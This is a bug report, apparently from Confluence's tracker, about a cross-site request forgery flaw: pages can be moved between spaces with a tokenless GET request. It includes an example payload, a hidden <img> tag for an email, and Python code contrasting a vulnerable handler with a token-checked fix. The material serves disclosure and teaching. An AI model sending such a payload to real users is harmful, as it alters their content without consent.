Moving pages around spaces using HTTP get without XSRF token
- Bug
- Resolution: Fixed
- Medium
- 5.2, 5.3
- None
- 5
Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:
http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2
Malicious example of how to exploit this (in an email message):
<img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">
(after opening the email, the page has been moved to S2 space)
scary!!
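As an added illustration, not Confluence code and not part of the report, the following Python models the difference between a movepage handler that accepts the GET above and one that only acts on a POST carrying the session's XSRF token. The `Request` class, the `PAGES` and `SESSIONS` stores, the `xsrf_token` parameter name and the session id are assumptions; the URL is the one from the report.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed stand-ins for the real server: pageId -> spaceKey, and
# logged-in session id -> that session's XSRF token (both hypothetical).
PAGES = {"787055": "S1"}
SESSIONS: dict = {}

# The URL from the report, reached by the hidden <img> in the email.
MOVE_URL = ("http://localhost:8080/confluence/pages/movepage.action"
            "?pageId=787055&position=topLevel&spaceKey=S2")


@dataclass
class Request:
    method: str
    url: str
    form: dict = field(default_factory=dict)  # body parameters (POST only)
    session_id: str = ""  # session cookie, attached by the browser to every request


def login(session_id):
    """Create a logged-in session and bind a fresh random XSRF token to it."""
    SESSIONS[session_id] = secrets.token_urlsafe(32)
    return SESSIONS[session_id]


def params(req):
    """Merge query-string and body parameters, body winning."""
    merged = {k: v[0] for k, v in parse_qs(urlsplit(req.url).query).items()}
    merged.update(req.form)
    return merged


def move_page_vulnerable(req):
    """Before the fix: any request carrying a logged-in session cookie moves the
    page, regardless of HTTP method and with no proof the user intended it."""
    if req.session_id not in SESSIONS:
        return "401 not logged in"
    p = params(req)
    PAGES[p["pageId"]] = p["spaceKey"]
    return "200 moved"


def move_page_hardened(req):
    """After the fix: the state change needs a POST whose body carries the
    session's XSRF token. A cross-site <img> or form can send the cookie but
    cannot read the token, so the constant-time comparison fails."""
    if req.session_id not in SESSIONS:
        return "401 not logged in"
    if req.method != "POST":
        return "405 state-changing action requires POST"
    supplied = req.form.get("xsrf_token", "")
    if not hmac.compare_digest(supplied, SESSIONS[req.session_id]):
        return "403 missing or invalid XSRF token"
    p = params(req)
    PAGES[p["pageId"]] = p["spaceKey"]
    return "200 moved"


def run_scenario():
    """Replay the report's forged GET and a legitimate move against both handlers."""
    PAGES["787055"] = "S1"
    SESSIONS.clear()
    token = login("victim-session")  # constructed session id

    # The <img src=...> from the report: a GET with the victim's cookie and no body.
    forged = Request("GET", MOVE_URL, session_id="victim-session")
    before = move_page_vulnerable(forged), PAGES["787055"]  # page ends up in S2
    PAGES["787055"] = "S1"
    after = move_page_hardened(forged), PAGES["787055"]  # page stays in S1

    # Even as a POST, a cross-site request has no way to include the token.
    forged_post = Request("POST", MOVE_URL, session_id="victim-session")
    after_post = move_page_hardened(forged_post), PAGES["787055"]

    # A move submitted from the application's own form carries the token.
    legit = Request("POST", "http://localhost:8080/confluence/pages/movepage.action",
                    form={"pageId": "787055", "position": "topLevel",
                          "spaceKey": "S2", "xsrf_token": token},
                    session_id="victim-session")
    legit_result = move_page_hardened(legit), PAGES["787055"]
    return {"vulnerable_get": before, "hardened_get": after,
            "hardened_post_no_token": after_post, "hardened_legit_post": legit_result}


if __name__ == "__main__":
    for name, (status, space) in run_scenario().items():
        print(f"{name:24s} {status:45s} page now in {space}")
```

The method check alone is not enough, which is why the handler also verifies the token: rejecting GET stops the image-tag variant from the report, but only a secret the cross-site origin cannot read ties the request to the user's own intent.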